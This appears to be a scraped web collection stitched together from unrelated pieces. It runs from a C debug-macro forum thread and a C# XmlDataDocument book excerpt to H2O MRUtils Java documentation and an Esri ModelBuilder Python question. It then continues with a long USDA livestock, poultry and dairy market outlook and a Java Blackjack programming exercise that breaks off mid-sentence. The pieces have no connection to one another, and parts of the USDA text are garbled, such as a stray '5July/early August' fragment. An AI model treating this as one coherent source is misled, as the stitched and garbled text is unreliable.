Didn't I give you all the working parts? Turns out the question mark follows the first call, so it seems like that's some left over crap in the buffer or something. I'll need to talk to the guys who wrote that function... Thanks a ton, guys, for all the help. This is the CodeVision compiler for Atmel microprocessors. Apparently it accepts the variable-list macros, do you see any danger with using it?

>>using it? If it works, that's fine, yet it won't be portable - that's the downside... That's why I was asking to see the complete code ;) To find where the question mark comes from.

Oh, I would never inflict all that on you. That's a 5,000 point question.

Will throw that question to a coworker, at least I have the macro working so I'm happy. I think the code below should demonstrate. Paul

You mean, like this http:#20844363 ? Paul

Not sure I'm back yet but I do have a browse in 'C' most days. You guys hold the fort so well :) I've been working on a private project but that's coming to an end soon. My next is a technical one in C so I hope to be visiting often. Paul
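Pulling the thread's advice together, here is a small self-contained consolidation of my own (not code posted by any participant): the do/while(0) wrapper so the call site always takes a semicolon, plus the C99 variadic form discussed at the end.

    #include <stdio.h>
    #include <stdarg.h>

    #define TEST_ENABLE_OUTPUT              /* comment out to strip test output */

    static void print_test_message(const char *format, ...)
    {
        va_list ap;
        va_start(ap, format);
        vprintf(format, ap);
        va_end(ap);
    }

    #ifdef TEST_ENABLE_OUTPUT
    /* do/while(0) swallows exactly one trailing semicolon, so the macro
       behaves like an ordinary statement inside if/else chains. */
    #define TEST_OUTPUT(...) do { print_test_message(__VA_ARGS__); } while (0)
    #else
    #define TEST_OUTPUT(...) do { } while (0)
    #endif

    int main(void)
    {
        int aa = 45;
        TEST_OUTPUT("Hello %i,%i\n", aa, aa);   /* call site always ends in ; */
        return 0;
    }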
https://www.experts-exchange.com/questions/23145299/How-to-make-my-debug-macros-very-concise.html
CC-MAIN-2018-34
en
refinedweb
The representation of relational table data can be poured like water back and forth between a DataSet object and an XML representation. In particular, the XmlDataDocument class, defined in the System.Xml namespace, has a special relationship to the DataSet class. It allows us to load relational data (or XML data, of course) and manipulate that data using the W3C Document Object Model (DOM). One way to do the binding is to pass the DataSet object to the XmlDataDocument constructor: DataSet ds = new DataSet(); adapter.Fill( ds, "FOOD_DES" ); XmlDataDocument xmlDoc = new XmlDataDocument( ds ); Now we can manipulate the XmlDataDocument just as if we had directly loaded it with XML data. In this section we look at the DOM, its navigation ...
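As a small continuation of the idea in the excerpt, a hypothetical fragment (not from the book) that only assumes the ds and xmlDoc objects created above:

    // Changes made through the DOM are visible in the DataSet, and vice versa.
    foreach (System.Xml.XmlNode row in xmlDoc.DocumentElement.ChildNodes)
    {
        // Each child element corresponds to one row of the bound table,
        // e.g. one <FOOD_DES> element per row of the FOOD_DES table.
        System.Console.WriteLine(row.Name);
    }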
https://www.safaribooksonline.com/library/view/c-primer-a/0201729555/0201729555_ch05lev1sec11.html
CC-MAIN-2018-34
en
refinedweb
public class MRUtils extends java.lang.Object

Methods inherited from class java.lang.Object: clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait

public MRUtils()

public static Frame sampleFrame(Frame fr, long rows, long seed)
    fr - Input frame
    rows - Approximate number of rows to sample (across all chunks)
    seed - Seed for RNG

public static Frame shuffleFramePerChunk(Frame fr, long seed)
    fr - Input frame

public static Frame sampleFrameStratified(Frame fr, Vec label, Vec weights, float[] sampling_ratios, long maxrows, long seed, boolean allowOversampling, boolean verbose)
    fr - Input frame
    label - Label vector (must be categorical)
    weights - Weights vector, can be null
    sampling_ratios - Optional: array containing the requested sampling ratios per class (in order of domains), will be overwritten if it contains all 0s
    maxrows - Maximum number of rows in the returned frame
    seed - RNG seed for sampling
    allowOversampling - Allow oversampling of minority classes
    verbose - Whether to print verbose info

public static Frame sampleFrameStratified(Frame fr, Vec label, Vec weights, float[] sampling_ratios, long seed, boolean debug)
    fr - Input frame
    label - Label vector (from the input frame)
    weights - Weight vector (from the input frame), can be null
    sampling_ratios - Given sampling ratios for each class, in order of domains
    seed - RNG seed
    debug - Whether to print debug info
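A minimal usage sketch of the samplers documented above. The setup is hypothetical: it assumes an already-initialized H2O runtime and a parsed Frame with a categorical label column, neither of which this page covers; package names follow the h2o-core javadoc.

    import water.fvec.Frame;
    import water.fvec.Vec;
    import water.util.MRUtils;

    class SamplingSketch {
        // fr: an already-parsed H2O Frame; label: its categorical response column.
        static Frame simpleSample(Frame fr) {
            // Roughly 10,000 rows, fixed seed for reproducibility.
            return MRUtils.sampleFrame(fr, 10000L, 42L);
        }

        static Frame stratifiedSample(Frame fr, Vec label) {
            // An all-zero ratios array asks sampleFrameStratified to derive
            // the per-class ratios itself, as described above.
            float[] ratios = new float[label.domain().length];
            return MRUtils.sampleFrameStratified(fr, label, null, ratios,
                                                 5000L, 42L, true, false);
        }
    }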
http://docs.h2o.ai/h2o/latest-stable/h2o-core/javadoc/water/util/MRUtils.html
CC-MAIN-2018-34
en
refinedweb
Hi,

    def CheckValueExists(gefülltesFeldBis1):
        import arcpy
        if gefülltesFeldBis1 != '':
            return "true"
        else:
            return "false"

the expression is:

    CheckValueExists("%gefülltesFeldBis1%")

I get the error message

    ERROR 000989 Python-Syntaxfehler: Parsing error SyntaxError: invalid syntax (line 1)

Can anyone please explain what I do wrong? Many thanks, Tegir
Originally my submodel looks like this: [attachment 26141: screenshot of the submodel]. Sorry, it's in German, but basically it copies the one attribute line of the point shapefile 8 times and adds to each new table 3 fields, "NewClass", "From" and "To" ("Neu", "Von" and "Bis" in German). Then the correct water heights are copied into the respective fields and the unnecessary ones are deleted. In the end all 8 tables are merged together into a single table, which looks like this: [attachment 26142: screenshot of the merged table]. The last 3 columns are the important ones, with the "NewClass", "From" and "To" values.

Now I thought about doing an if-then logic inside ModelBuilder, but maybe this gets too complicated and I need to use a script. For example, in class 3 I have no "To" value, and therefore also no "From" value in class 4. Then I would like to delete the line of class 3 and reset the "NewClass" value of "4" to "34". I hope that's clearer now; for sure, writing it down already helped me to get it clearer in my head :) I'll let you know as soon as I find a workaround. Help is very much appreciated!
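A minimal sketch of the searchCursor approach suggested in the replies above. The helper name and the hard-coded 'Bis' field name are assumptions made for this illustration, not code from the thread:

import arcpy

def field_has_value(table, field_name="Bis"):
    """Return False if any row's value in field_name is NULL, empty, blank, or 0."""
    with arcpy.da.SearchCursor(table, [field_name]) as rows:
        for (value,) in rows:
            # Compare against None itself, not the text string "None",
            # and also catch the other "empty" values mentioned above.
            if value is None or value in ('', ' ', 0):
                return False
    return True

# Usage sketch: pass the table (what the thread's variable actually refers to),
# e.g. field_has_value(gefuelltesFeldBis1)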
https://community.esri.com/thread/77082-syntax-problem-if-then
CC-MAIN-2018-22
en
refinedweb
USDA Livestock, Dairy and Poultry Outlook
19 September 2012

The U.S. broiler meat production estimate for third-quarter 2012 was reduced by 50 million pounds to 9.3 billion pounds, down 3 percent from the previous year. Over the last 5 weeks, an average of 162 million broiler chicks was placed weekly for grow out, about even with the previous year. Turkey meat production in July 2012 was 497 million pounds, 11 percent higher than last July, as both the number of turkeys slaughtered and their average weights were higher.

USDA Livestock, Dairy, and Poultry Outlook - September 2012

Poultry

Broiler Estimates Lowered for Third and Fourth Quarters

The U.S. broiler meat production estimate for third-quarter 2012 was reduced by 50 million pounds to 9.3 billion pounds, down 2.5 percent from the previous year. Broiler meat production in July 2012 was 3.13 billion pounds, 3 percent higher than a year earlier. This increase in production can be attributed chiefly to the fact that July 2012 had one additional slaughter day compared with the previous year. The number of birds slaughtered in July was up 3 percent to 723 million, but average live weight was down slightly to 5.76 pounds. During August and September, the number of chicks placed for growout is expected to remain at or near the level of the previous year, while higher average weights are also expected to continue. However, there are 2 fewer slaughter days in September compared with last year.

The broiler meat production estimate for fourth-quarter 2012 was lowered to 9.0 billion pounds, down 150 million pounds from the previous estimate. The reduction in fourth-quarter production stems chiefly from the impact of lower expected chick placements brought about by continued high grain prices. Weekly heavy hen slaughter has been above year-earlier levels for much of August, and with pullets below last year in July, it is likely that broiler-type egg production will remain close to or below last year. For the 5-week period ending September 1, the National Agricultural Statistics Service estimated that an average of 162 million broiler chicks was placed weekly for grow out. This is almost exactly the same number of chicks placed weekly in a similar period in 2011. In 2011, between the middle of August and the middle of October, the number of chicks placed for growout was much lower than the previous year, which resulted in fourth-quarter 2011 broiler meat production being 7 percent lower than the previous year. In 2012, it is expected that the number of chicks placed for growout will be very similar to the previous year. Offsetting the stability in hatchery numbers will be one more slaughter day in the fourth quarter. Average weights in the fourth quarter are expected to be only slightly higher than the previous year.

The new production estimate for 2012 is 36.8 billion pounds, 1.2 percent lower than the previous year. Much higher corn and soybean meal prices are also expected to weigh heavily on broiler production in 2013. Production in 2013 was reduced by 145 million pounds to 36.4 billion pounds, down 1.1 percent from a year earlier.

Stock Levels Up Slightly at the End of July

After being basically unchanged between May and June, broiler products in cold storage at the end of July rose slightly to 613 million pounds, but remained down about 15 percent from the previous year. Cold storage holdings were down for most individual products, with holdings for several products down significantly.
Cold storage holdings of whole birds were 42 percent lower than the previous year, breast meat was down 27-percent, and leg-quarters were down 16 percent. The only increase was a 36-percent rise in stocks of legs. Cold storage holdings of broiler products are expected to decline slightly by the end of the third-quarter to 600 million pounds. As fourth-quarter 2012 production falls from third-quarter levels, stocks are expected to gradually decline and end the year at 575 million pounds. Broiler Prices Move Higher in August Generally lower broiler production and continued strong export demand have kept broiler stocks steady for the last 3 months, with broiler prices gradually moving higher. Prices for whole birds averaged $0.83 per pound on the New York market in August, up only slightly from July but 2.5 percent higher than the previous year. Prices in August were about even with the previous year for parts such as legquarters (up less than 1 percent) and boneless/skinless thighs (down fractionally). However, wholesale prices for boneless/skinless breast meat in the Northeast market averaged $1.45 per pound in August, 12 percent above the previous year, and prices for wings continue to be very strong, averaging $1.86 per pound in August, up 92- percent from a year earlier. With broiler processors expected to lower production in response to much higher grain prices, prices for most broiler parts are expected to continue to move higher through the end of 2012 and into 2013. Turkey Production Up 11 Percent in July Turkey meat production in July was 497 million pounds, up 11 percent from July 2011. The increase in July was due chiefly to a larger number of birds slaughtered. Part of the increase was the result of one more slaughter day in July 2012 than in July 2011. Total meat production was also boosted by a slight increase in average bird weights to 29.3 pounds, up just under 1 percent from a year earlier. Over the first 7 months, 2012 turkey production has totaled 3.4 billion pounds, an increase of 4 percent from the same period in 2011. The increase in turkey production is due to a combination of a 3-percent gain in the number of birds slaughtered and a 1- percent gain in their average weight at slaughter. The production estimate for 2013 was lowered by 30 million pounds to 5.8 billion pounds, down 3.2-percent from 2012. The reduction reflects the impact that higher feed prices are expected to have on poultry production and placements in the coming months. The higher feed costs coupled with relatively weak economic conditions, are expected to cause turkey producers to lower production. Cold storage holdings for turkey totaled 555 million pounds at the end of July, up 5.7 percent from the previous year. Cold storage holdings of whole turkeys totaled 304 million pounds, 55 percent of all turkey cold storage holdings, with holdings of whole toms at 153 million (up 2 percent) and holdings of whole hens at 151 million (up 10 percent). Compared with the same period in 2011, cold storage holdings for turkey parts were mixed, with legs and mechanically deboned meat up sharply (both by over 100 percent). Holdings of turkey parts in the “other” and unclassified categories were both down (11 percent and 8 percent). Similar to the increase in whole birds, holdings of turkey breast meat rose 6 percent from a year earlier, to 74 million pounds. Turkey meat production is expected to be higher on a year-over-year basis for both the third and fourth quarters of 2012. 
Coupled with higher stocks thus far in the year, this is expected to cause cold storage holdings to be higher than the previous year through the end of 2012. With lower turkey meat production forecast for 2013, cold storage holdings of turkey products in 2013 are expected to drop below yearearlier levels. In August, prices for whole frozen hen turkeys averaged $1.09 per pound, up 3 percent from the previous year. Prices for whole hen turkeys on a year-over-year basis have been higher for the last 33 months. Prices for whole birds are expected to remain above year-earlier levels through the third and fourth quarters of 2012. The demand for turkey parts in relation to supply has not been as strong, in general, as for whole turkeys. In July, prices for turkey breasts averaged $1.30 per pound, 5 percent higher than the previous year. Prices for many other turkey parts in July were down significantly from the previous year. Drumsticks, at $0.58 per pound, were down 30 percent; wings were only $0.44 per pound, a decline of 46- percent from July 2011, and boneless/skinless breasts were down 23 percent to $1.74 per pound. With turkey production expected to be higher through the end of 2012, the prices for turkey parts are expected to be under some downward pressure and may not have a normal seasonal increase in the fourth quarter. Table Egg Flock Higher in July In July, the number of birds in the table egg flock was 281.1 million, up just under 1 percent from a year earlier. The table egg flock has been larger year-over-year throughout 2012. With the increase in the table egg flock, table egg production has increased. Over the first 7 months of 2012, table egg production has totaled 3.9 billion dozen, 1.1 percent higher than the previous year. Table egg production is expected to continue to be higher in third-quarter 2012 but to fall in the fourth quarter, and production is also expected to be lower in 2013. The decrease, like that for broilers and turkeys, is expected to stem from a contraction in production arising from higher feed costs. The hatching flock for meat-type birds (broiler-breeder flock) was reported at 51.1 million in July, down 6 percent from the previous year. The number of meat-type hens in the broiler-hatchery flock has been significantly lower on a year-over-year basis since mid 2011. The lower number of hens reflects the decreases in broiler chick demand as broiler integrators cut back expansion plans due to high grain prices and relatively weak domestic demand. In July and August 2012, the weekly wholesale price for eggs in the New York market had a short-lived but sharp spike in prices. Prices at the beginning of July averaged around $1.05 per dozen and then rose sharply to almost $1.60 per dozen, before falling back to around $1.16 per dozen by the beginning of September. Since the beginning of September, prices have begun to recover. With this run-up in egg prices, the third-quarter 2012 average for New York egg prices is now expected to be $1.26-$1.29 per dozen, up almost $0.12 from thirdquarter 2011. Prices in fourth-quarter 2012 are forecast at $1.32-$1.38 per dozen. This strengthening in prices in the fourth quarter is expected to come from a slow growth in production in the face of the normal increase in seasonal demand. Poultry Trade Broiler Shipments Fall in July July broiler shipments totaled 602.9 million pounds, a 7-percent reduction over broiler meat shipped in July 2011. 
The primary reason for the drop in shipments was weak demand in two major markets (Hong Kong and Cuba) and in at least two minor markets (Georgia and South Korea). Shipments to Hong Kong declined 78 percent, while shipments to Cuba, Georgia, and South Korea decreased 52, 67, and 44 percent, respectively. Shipments to the two largest broiler markets, Mexico and Russia, rose in July 2012: broiler meat shipped to Mexico increased 26 percent from a year earlier, and shipments to Russia increased 23 percent. However, these two increases were not enough to offset the decline in shipments to other markets. Turkey Shipments Remain Strong in July Turkey shipments in July were up 25 percent from 2011. Over 65.6 million pounds of turkey meat were shipped abroad. Turkey shipments have been up despite higher year-over-year whole hen turkey prices. The chief reason for this increase is strong foreign demand. Over half (54 percent) of the turkey meat shipped internationally went to Mexico, the largest U.S. turkey market; turkey shipments to Mexico increased 17 percent from a year earlier. There were also significant increases in turkey shipments to the Philippines, China (mainland), and Taiwan. Turkey shipments to the Philippines and Taiwan rose 776 and 492 percent, respectively, from July 2011. China imported 51 percent more turkey meat in July 2012 than it did a year ago. Egg Shipments Are Up in July July egg shipments totaled 23.6 million dozen, up 16 percent from last year. Exports in July may have been supported by relatively low prices in the preceding months. The primary reason for the increase is relatively low egg prices. In the second quarter, wholesale prices for one dozen grade A large eggs in the New York market averaged $1.07. The three largest U.S. egg markets are Hong Kong, Japan, and Canada. Among these three markets, egg shipments to Hong Kong were the largest at 4.9 million dozen, a 19-percent increase from last July. Canada had the largest increase from a year ago at 36.7 percent. Japan, imported 7.7 percent more eggs in July 2012 than a year ago. Beef/Cattle Drought Continues To Affect Cow Slaughter and Feedlot Placements For most of 2012, high feeding costs and low milk prices have driven year-overyear increases in federally inspected weekly dairy cow slaughter. Federally inspected beef cow slaughter has also increased, but more erratically and mostly in a typical seasonal pattern, since mid-April 2012. Furthermore, while beef cow slaughter has also remained generally below 2011 and 2010 levels, it has been heavy relative to the January 1, 2012 cow inventory, but the drought-induced beef cow slaughter that occurred in 2011 was heavier relative to the 2011 cow inventory. As a result, total federally inspected cow slaughter is below year-earlier slaughter for most weeks in 2012. Further, slaughter cow prices have generally declined since their May 2012 peak, but while currently below that peak, they remain above year-earlier prices on a weekly basis. While prices for feeder cattle in 2012, especially the heavier cattle, have been generally well above prices for corresponding periods in 2011, in July they declined to levels that are about even with same-month 2011 levels. This is largely due to drought-reduced pasture availability and the impact of high feed costs on cattlefeeding margins that have been negative since April 2011. 
At the same time, prices for lightweight feeder cattle began increasing relative to heavyweight cattle, motivated in part by the positive outlook for feeder cattle demand in 2013 and prospects for winter pasture. However, the extent of demand for feeder cattle will depend on the final outcome of this fall’s corn harvest. Demand for heifer calves have begun increasing seasonally since July lows. In addition, some current industry anecdotes suggest packers may be having difficulties finding enough finished cattle to meet their needs, which should be supportive of prices, except that packer margins will decline from the higher fed cattle prices combined with static or declining wholesale values. However, fed cattle prices could be pressured if feedlot managers are not marketing finished cattle in as timely a manner as previously thought. Evidence supporting a possible buildup includes higher dressed weights, a larger number of cattle on feed for more than 120 days, and higher dressing percentages. For instance, while dressed weights are increasing seasonally, they are well above year-earlier levels and are not likely to peak until around mid-October when they traditionally peak. Another indicator is the record number (since August 1996) of cattle on feed for 120-plus days on August-pound feeder calves placed in late 2011. A third indicator is the 5July/early August 2012 and are above year-earlier values. Despite this, improving fed cattle prices have pressured packer margins, which have deteriorated recently. Part of the reason for the improved cutout values is that demand for some middle meats and other cuts helped move monthly retail Choice beef prices higher in July. While Choice retail values improved slightly in July, the All-fresh beef price set yet another record at $4.71 per pound. However, both retail Choice and All-fresh beef prices retreated slightly in August to $4.95 and $4.70. While the demand for ground products appears to be providing ongoing price support to the All-fresh beef price of which it is a component, it does not seem to be sufficient to completely offset the negative pressure associated with the end of the summer grilling season. U.S. Beef Import Levels Remain Buoyant, While Exports Face Pressure U.S. beef imports through July were 16 percent higher than a year earlier, and growth is expected to continue into next year, with third- and fourth-quarter imports in 2012 forecast at 615 and 540 million pounds, respectively. Although imports have been strong for much of 2012, growth in beef imports from Oceania slowed entering the summer months and imports from Canada have been lower year-overyear since the second quarter. Nevertheless, total beef imports for 2012 are forecast at 2.4 billion pounds, or 17 percent higher than a year earlier. The momentum in the import market is expected to continue into next year as total imports are forecast 9 percent higher year-over-year. Momentum in the U.S. beef export market continues to be hampered largely by a relatively stronger U.S. dollar, constraining export levels through July to 12 percent below a year-ago. Excluding Vietnam and Hong Kong, export levels to the remaining top 10 export countries through July have been lower, year-over-year. Third- and fourth-quarter exports are forecast at 670 and 625 million pounds, respectively, with total 2012 export levels forecast at 2.48 billion pounds, or 11 percent below a year ago. U.S. exports in 2013 are forecast slightly lower at 2.45 billion pounds. 
Dairy

A Lower Forecast Milk Supply in 2013 Helps Keep Prices Firm.

Pork/Hogs

Hog Producers Appear To Be Holding Onto Their Sows

Despite drought-induced record-high corn and soybean meal prices, sow slaughter data suggests that hog producers are not "sprinting towards the exits." Monthly hog slaughter depicted below indicates that sow slaughter for June (the month when drought conditions became apparent) was more than 9 percent below slaughter in June 2011, 8.7 percent below the 3-year average, and 11.3 percent below the 5-year average. For July, while sow slaughter was 5.7 percent above the July 2011 level, it was 3.2 percent below the 3-year average July sow slaughter and 8.4 percent below the 5-year July average. USDA/NASS will release August federally inspected sow slaughter data on September 21st. In the meantime, weekly sow slaughter for the weeks ending August 4th through September 1st shows slaughter to be less than 5 percent above comparable weeks a year ago. It is possible, however, that higher sow prices induced larger August slaughter numbers. After moving lower through July, sow prices in August appear to have bottomed out.

Moderate summer sow slaughter suggests a scenario in which, despite record-high prices for corn and soybean meal, the current price environment will persist through only the 2012-2013 crop year, a belief shared by most producers. Preserving productive capital stocks (i.e., sow inventory) during difficult market conditions would leave hog producers prepared to accelerate production as an improved feed grains production outlook and a depleted animal protein supply restore prospects for positive producer returns. Fourth-quarter 2012 pork production is expected to be almost 6.3 billion pounds, 1.6 percent greater than in the same period a year ago. Estimated dressed weights in the fourth quarter will likely continue to run just slightly ahead of year-earlier weights.

Third-Quarter Exports Begin on a Positive Note

July pork exports were almost 398 million pounds, 3 percent greater than a year ago. Increased July shipments to Mexico, China, Canada, and Russia more than offset lower exports to Japan, South Korea, and Hong Kong. The five largest export destinations for U.S. pork are listed in the table below. The calculated export shares indicate that Japan's share of July exports has come down significantly compared with July 2011, while Mexico, China, Canada, and Russia all took larger shares of July exports than in July 2011. The five largest export destinations together accounted for almost 81 percent of July shipments, an increase from the 76 percent registered in July 2011.
http://www.thepoultrysite.com/reports/?id=924&country=US
CC-MAIN-2018-22
en
refinedweb
In JLS 8, Section 8.4.8.1 there is a statement: "A concrete method in a generic superclass C can, under certain parameterizations, have the same signature as an abstract method in that class. In this case, the concrete method is inherited and the abstract method is not. The inherited method should then be considered to override its abstract peer from C."

Maybe:

public abstract class A<T> {
    public abstract void m(T t);
    public void m(String s) {}
}

public class B extends A<String> { }

In this case both methods in B will be void m(String).
https://codedump.io/share/Cob8j4p5o7hh/1/abstract-and-concrete-method-with-same-signature-in-generic-class
CC-MAIN-2018-22
en
refinedweb
<sstream> Defines several template classes that support iostreams operations on sequences stored in an allocated array object. Such sequences are easily converted to and from objects of template class basic_string. For a list of all members of this header, see <sstream> Members. #include <sstream> Remarks Objects of type char * can use the functionality in <strstream> for streaming. However, <strstream> is deprecated and the use of <sstream> is encouraged. See Also Reference Thread Safety in the Standard C++ Library
https://docs.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2008/kb1es779(v=vs.90)
CC-MAIN-2018-22
en
refinedweb
Retail SDK samples Important This topic applies to Dynamics 365 for Retail and Dynamics 365 for Finance and Operations. This topic describes three new samples that were released together with the Retail SDK in December 2016. Override message handler sample Scenario: Sometimes, one of Fabrikam's customers is in the customer relationship management (CRM) system but isn't imported into Microsoft Dynamics 365 for Retail. Therefore, Fabrikam wants to look up the customer from the CRM system and the point of sale (POS). Here are the business requirements: - Search for customers from the CRM system and the POS. - Merge the results, and show a unified result set in Retail Modern POS (MPOS). Here are some situations where you might use the override message handler: - You want to use a third-party inventory system for stock updates and inquiries. - You want to integrate with an external tax system for tax calculation. - You want to integrate with a third-party loyalty system. Here are the basic tasks in the sample: - Override and implement the existing customer search request, because we are changing the existing search behavior so that an external search is performed. - After the external search is completed, call the standard search request, and merge both results. Here is the code for these tasks. public sealed class CustomerSearchRequestHandler : SingleRequestHandler<CustomersSearchRequest, CustomersSearchResponse> { /// <summary> /// Executes the workflow to retrieve customer information. /// </summary> /// <param name="request">The request.</param> /// <returns>The response.</returns> protected override CustomersSearchResponse Process(CustomersSearchRequest request) { ThrowIf.Null(request, "request"); ThrowIf.Null(request.Criteria, "request.Criteria"); // Execute custom customer search logic here. CustomersSearchResponse externalResponse = this.ExternalCustomerSearch(request.Criteria.Keyword); // Execute original customer search logic. var requestHandler = new Microsoft.Dynamics.Commerce.Runtime.Workflow.CustomerSearchRequestHandler(); CustomersSearchResponse originalResponse = request.RequestContext.Runtime.Execute<CustomersSearchResponse>(request, request.RequestContext, requestHandler, skipRequestTriggers: false); return new CustomersSearchResponse(externalResponse.Customers.Union(originalResponse.Customers).AsPagedResult()); } } The full sample code is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.CustomerSearchSample folder of the software development kit (SDK). Best practice If you're planning to completely change the behavior of an existing request or response, or if you want to use your logic in addition to the standard logic, override the standard message handler. Request handler triggers and extension properties sample Scenario: Fabrikam wants to collect customer email preferences for email marketing. Here are the business requirements: - Enable a customer’s email preferences to be collected and updated from the POS. - A customer's email preferences should become effective immediately. Here are some situations where you might use extension properties: - You want to extend entities such as the customer and sales order, but you don't want to create a new separate entity. - As new entity fields are read from or written to the database, they should be sent between the commerce runtime (CRT) and the POS, and updated in the client. - You want temporary internal flags that can be used to control the flow of custom logic. 
- You want to set custom receipt fields that the receipt customization will access when receipts are generated. The following steps show the CRT code changes. For MPOS and the channel database, see the full sample. Notice that the following samples differ from previous code, where changes to the standard database artifacts were required. (For example, to expose new columns as extension properties, changes to the view were required. To receive a list of extension properties and update these properties together with standard fields, changes to the stored procedure were required.) Eventually, as we move to a model that doesn't have inline changes, merge conflicts should not occur even when the database is updated. Therefore, our new recommendation is that you make separate database calls to read, write, and update entities. Read the entity. Implement the post-trigger for GetCustomerDataRequest, read the value from channel database, and add the value to the extension property. public class GetCustomerTriggers : IRequestTrigger { public IEnumerable<Type> SupportedRequestTypes { get { return new[] { typeof(GetCustomerDataRequest) }; } } public void OnExecuted(Request request, Response response) { // Check if default handler found a customer. var customer = ((SingleEntityDataServiceResponse<Customer>)response).Entity; if (customer == null) { return; } // Read from a custom view mapped to a custom table. var query = new SqlPagedQuery(QueryResultSettings.SingleRecord) { Select = new ColumnSet(new string[] { "EMAILOPTIN" }), From = "CUSTOMEREXTENSIONVIEW", Where = "ACCOUNTNUM = @accountNum AND DATAAREAID = @dataAreaId" }; query.Parameters["@accountNum"] = customer.AccountNumber; query.Parameters["@dataAreaId"] = request.RequestContext.GetChannelConfiguration().InventLocationDataAreaId; using (var databaseContext = new SqlServerDatabaseContext(request)) { // Use ExtensionEntity which will map all columns to extension properties. ExtensionsEntity extensions = databaseContext.ReadEntity<ExtensionsEntity>(query).FirstOrDefault(); var emailOptIn = extensions != null ? extensions.GetProperty("EMAILOPTIN") : null; // If the EmailOptIn is found, set it at a new extension property at the Customer. if (emailOptIn != null) { customer.SetProperty("EMAILOPTIN", emailOptIn); } } } } Write the entity. Override the handler for CreateOrUpdateCustomerDataRequest to run the original request handler and the custom stored procedure inside a transaction scope. If the database transaction isn't required, a post-trigger suffices here. protected override SingleEntityDataServiceResponse<Customer> Process(CreateOrUpdateCustomerDataRequest request) { using (var databaseContext = new SqlServerDatabaseContext(request)) using (var transactionScope = new TransactionScope()) { // Execute original functionality to save the customer. var requestHandler = new Microsoft.Dynamics.Commerce.Runtime.DataServices.SqlServer.CustomerSqlServerDataService(); var response = (SingleEntityDataServiceResponse<Customer>)requestHandler.Execute(request); // Execute additional functionality to save the customer's extension properties. if (!request.Customer.ExtensionProperties.IsNullOrEmpty()) { // The stored procedure will determine which extension properties are saved to which tables. 
ParameterSet parameters = new ParameterSet(); parameters["@TVP_EXTENSIONPROPERTIESTABLETYPE"] = new ExtensionPropertiesTableType(request.Customer.RecordId, request.Customer.ExtensionProperties).DataTable; databaseContext.ExecuteStoredProcedureNonQuery("UPDATECUSTOMEREXTENSIONPROPERTIES", parameters); } transactionScope.Complete(); return response; } } Before you try this sample, be sure to create the custom tables, views, and stored procedures in the channel database. Additionally, make the relevant changes to MPOS. The full sample code, together with additional comments, is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.EmailPreferenceSample folder of the SDK. For information about how to create custom database artifacts, see the RetailSDK\Documents\SampleExtensionsInstructions\EmailPreference folder of the SDK. Best practice Because the order of triggers isn't guaranteed when the triggers are chained, and because of the internal cache mechanism, the pre-triggers should not change the request message, and the post-triggers should not change the response message. Extension properties are allowed, because no core properties are being changed. You should use pre-triggers and post-triggers to handle extension properties. You should also use pre-triggers to do validation and post-triggers to do additional actions. Custom fields and custom receipt types sample Scenario: Fabrikam wants to print a special receipt whenever products that have a warranty are sold. Sales receipts should include the warranty expiration date, the warranty ID, and other information. Here are the business requirements: - Print special receipts. - Print additional warranty information on sale receipts. The following steps show the CRT code changes: At the headquarters (HQ), create two custom receipt fields: EXPIRATIONDATE for the warranty expiration date and WARRANTYID for the warranty ID. Add these fields to the receipt format layout. To add the custom fields to the sales receipts or any receipt format, implement GetSalesTransactionCustomReceiptFieldServiceRequest, as shown in the following code. This code is called every time that the standard code doesn’t recognize the receipt field. public IEnumerable<Type> SupportedRequestTypes { get { return new[] { typeof(GetSalesTransactionCustomReceiptFieldServiceRequest) }; } } public Response Execute(Request request) { Type requestedType = request.GetType(); if (requestedType == typeof(GetSalesTransactionCustomReceiptFieldServiceRequest)) { return this.GetCustomReceiptFieldForSalesTransactionReceipts( (GetSalesTransactionCustomReceiptFieldServiceRequest)request); } throw new NotSupportedException(string.Format("Request '{0}' is not supported.", request.GetType())); } Add the logic for your sample fields. private GetCustomReceiptFieldServiceResponse GetCustomReceiptFieldForSalesTransactionReceipts( GetSalesTransactionCustomReceiptFieldServiceRequest request) { string receiptFieldName = request.CustomReceiptField; string returnValue = string.Empty; switch (receiptFieldName) { case "WARRANTYID": { // Write your logic } break; case "EXPIRATIONDATE": { // Write your logic } break; } return new GetCustomReceiptFieldServiceResponse(returnValue); } To create new receipt type, implement GetCustomReceiptsRequest. protected override GetReceiptResponse Process(GetCustomReceiptsRequest request) { Collection<Receipt> result = new Collection<Receipt>(); // 2. Now we can handle any additional receipt here. 
switch (request.ReceiptRetrievalCriteria.ReceiptType) { // An example of getting custom receipts. case ReceiptType.CustomReceipt1: { IEnumerable<Receipt> customReceipts = this.GetCustomReceipts(salesOrder, request.ReceiptRetrievalCriteria); result.AddRange(customReceipts); } break; default: // Add more logic to handle more types of custom receipt types. break; } return new GetReceiptResponse(new ReadOnlyCollection<Receipt>(result)); } The full sample code is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.ReceiptsSamplefolder folder of the SDK. Note: You should call the printing of the custom receipt type from the client. For more information, see Extensibility patterns and best practices. Best practice Avoid making database calls for each custom receipt field. Instead, use extension properties that were previously set on entities. Custom receipt types can be called by any logic (per sales line, one time per some condition). See the sample for a more complete scenario.
https://docs.microsoft.com/bg-bg/dynamics365/unified-operations/retail/dev-itpro/retail-sdk/retail-sdk-samples
CC-MAIN-2018-22
en
refinedweb
Solution for Programmming Exercise 6.9 This page contains a sample solution to one of the exercises from Introduction to Programming Using Java. Exercise 6.9: Write a Blackjack program that lets the user play a game of Blackjack, with the computer as the dealer. The applet should draw the user's cards and the dealer's cards, just as was done for the graphical HighLow card game in Subsection 6.7.6. You can use the source code for that game, HighLowGUI.java, for some ideas about how to write your Blackjack game. The structures of the HighLow panel and the Blackjack panel are very similar. You will certainly want to use the drawCard() method from the HighLow program. You can find a description of the game of Blackjack in Exercise 5.5. Add the following rule to that description: If a player takes five cards without going over 21, that player wins immediately. This rule is used in some casinos. For your program, it means that you only have to allow room for five cards. You should assume that the panel is just wide enough to show five cards, and that it is tall enough show the user's hand and the dealer's hand. Note that the design of a GUI Blackjack game is very different from the design of the text-oriented program that you wrote for Exercise 5.5. The user should play the game by clicking on "Hit" and "Stand" buttons. There should be a "New Game" button that can be used to start another game after one game ends. You have to decide what happens when each of these buttons is pressed. You don't have much chance of getting this right unless you think in terms of the states that the game can be in and how the state can change. Your program will need the 